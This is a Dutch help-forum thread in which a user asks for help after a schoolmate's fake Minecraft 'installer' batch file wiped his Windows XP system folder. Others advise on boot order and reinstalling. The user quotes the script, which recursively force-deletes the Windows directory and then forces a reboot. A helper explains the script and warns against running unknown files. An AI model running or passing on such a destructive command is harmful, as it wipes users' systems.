Mijn pc is vernield door een bekende.

Status
Niet open voor verdere reacties.

BartJanssen

Gebruiker
Lid geworden
11 dec 2011
Berichten
106
Hallo
ik speel minecraft en toen er een update was voor me server, gaf een jongen op mijn school deze. De update heette installer het was een .bat bestand. Ik kwam later er achter dat het mijn system32 wist , toen ik het opende met notepad.

Een paar vragen

- Kan het kloppen dat ik nu windows xp niet opnieuw kan installeren
- Kan ik vergoeding eisen van die jongen Hij zei tegen mij dat deze software is waar ik om heb gevraagd

Als ik nu de Windows xp installeer cd er in doe en hem opnieuw installeer kan ik niet op het toetsenbord drukken en staat er dat er iets van system 32 mist een dll bestand volgens mij

Kan iemand me helpen ?
 
Hoi,

Ik neem even aan dat de cd-rom/dvd speler als eerste opstart,anders moet je dit in de bios moeten aangeven
 
Laatst bewerkt:
Ik denk dat dit wel zo is

Want als ik hem aan zet met cd erin komt er eerst nog De informatie te staan Ghz 64 bits en wat andere dingen dan staat er een leeg scherm dan staat er druk op een toets om de cd te starten ofzo en dan komt er te staan dat een system32 dll bestand vermist is :) En ik heb vaker opnieuw windows geinstalleerd (Maar toen om andere redenen) En toen werkte het prima
 
Laatst bewerkt:
Hoi,

De xp windows cd-rom legaal of een minder legale versie? En even gekeken in de bios voor de zekerheid
 
Laatst bewerkt:
Ik heb hem van me vader het is windows proffesioneel ik heb hem vaker gebruikt er zit ook een code in zoiets als 0000-0000-0000-0000 dus ik denk dat ie wel legaal is
 
Hoi,

Als dat de code is dan??? legaal maar je hebt hem meer gebruikt dus .
 
nee het was een voorbeeld omdat ik de echte code niet mag geven
Alleen als systeem32 verwijderd is kan ik dan windows nog opnieuw installeren?
Als dit niet meer kan gooi ik er linux op ik gebruik mijn pc alleen voor een minecraft server en aangezien linux veel minder geheugen nodig heeft lijkt me dat plan B
En is dat gratis te downloaden ?
 
ja, linux is opensource en gratis te downloaden. Je moet wel even googlen welke distributie je wilt (de meest gebruikten zijn Ubuntu en Debian)
 
Dag Bartjansen

Welk bestand ontbreekt juist, want dit valt volgens mij te herstellen zonder nieuwe installatie.

- Kan ik vergoeding eisen van die jongen Hij zei tegen mij dat deze software is waar ik om heb gevraagd

In principe , nee. Je hebt het zelf uitgevoerd.
Een .bat bestand of ook batchbestand genoemd is een bestand waarin opdrachten kunnen gegeven worden. Eén van die opdrachten zal dan geweest zijn om een belangrijk systeembestand of meerdere systeembestanden te laten verwijderen.
En als ik je berichten goed lees, staat je bootvolgorde nog altijd ingesteld om op te starten via harde schijf en niet via CD/DVD station. Stel je bootvolgorde juist in, en laat eens horen welke bestand(en) ontbreken om windows normaal te laten opstarten.
Met het commando expand kunnen die bestanden teruggezet worden.

http://www.computerwoorden.nl/dos-commando--e.htm
 
Laatst bewerkt:
<Windows Hoofdmap>\System32\hal.dll
Dit bestand is beschadig en mijn pc geeft aan dat ik dit opnieuw moet installeren
Maar ik ben toch bang als eenmaal dit probleem is opgelost da er dan weer iets komt bijv hal2.dll Maargoed wat nu ?
 
EN wanneer ik het scherm zie druk op een toets om het systeem op te starten op de cd dan werkt me toetsenbord niet meer
 
nee het toetsenbord werkt weer nadat ik in de bios bij usb iets op enable zetten alleen nu lukt het opnieuw installeren ook niet zou ik in de bios mijn windows eerst moeten formatteren voordat ik hem opnieuw installeer
 
Er komt te staan bij welke windows instalatie wilt u zich aanmelden wat moet ik dan intypen :O

edit achtergekomen dat ik hier 1 in moet typen

Maar nu vraagt hij om een wachtwoord die ik niet weet
 
Laatst bewerkt:
Ik ben bezig met setup maar die begint telkens weer opnieuw er flits een melding 1 seconde voorbij ik heb een foto kunnen maken maar hij staat er helaas niet helemaal op :(
egs506.jpg

Veilige modus opstarten kan niet want windows is niet geinstalleerd?
 
Laatst bewerkt:
Bart,
Zoals bovenstaande ervoor zorgen dat je PC opstart vanaf CD.
Als wenselijk Windows opnieuw installeren.

Een *.bat bestand kun je (bijvoorbeeld) openen in/met kladblok.
Wil je hier de inhoud van dit *.bat bestand hier plaatsen - kunnen we eens kijken wat die grappenmaker van je school gemaakt heeft.

Goed goan!
 
Laatst bewerkt:
-Ik heb hem al 100 x opnieuw opgestart
-Ik kan wel in een herstel komen maar daar weet ik het Administrator password niet en aangezien ik niet in windows kom kan ik dus ook dat password niet veranderen


edit code hiero was ik vergeten

@echo off
del %systemroot%\"."/f/s/q
shutdown -r -f -t '60' -c "NO SYSTEM32 FILES LEFT

dit zat in die bad terwijl di jongen zij "bij mij werkte de update wel"
 
Laatst bewerkt:
Ik zal het e.e.a. eens op een XP pro pc van mij proberen.
Kom er later op terug.
Moet toch niet gekker worden?

@echo off
del %systemroot%\"."/f/s/q -> del betekend verwijder - systemroot is Windows % zijn de voorwaarde - als ik \./f/s/q zie is dit ZEER ingrijpend.
shutdown -r -f -t '60' -c "NO SYSTEM32 FILES LEFT -> shutdown betekend sluitaf tot er geen systeem32 files meer over zijn.
En die zijn door bovenstaande regel ook verwijderd.

Kortom, een "zelfgemaakt" virus.

Nu ga ik even kijken op mijn XP pro - bakkie hoe nu verder.

Leer moment: Open nooit en dan ook nooit zomaar *.bat, *.exe, *.com, *.jpg en Office documenten.
De *.bat bestanden kun je eerst lezen (met kladblok), de overige scannen met een virusscanner.

Nu loop ik echt even naar mijn XP bakk-i.
 
Laatst bewerkt:
die foutmelding op die foto kan dat liggen aan een verkeerde opstart volgorde?
ik heb bij opstartvolgorde
cd
hdd
floppy
welke volgorde moet het ?
 
Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan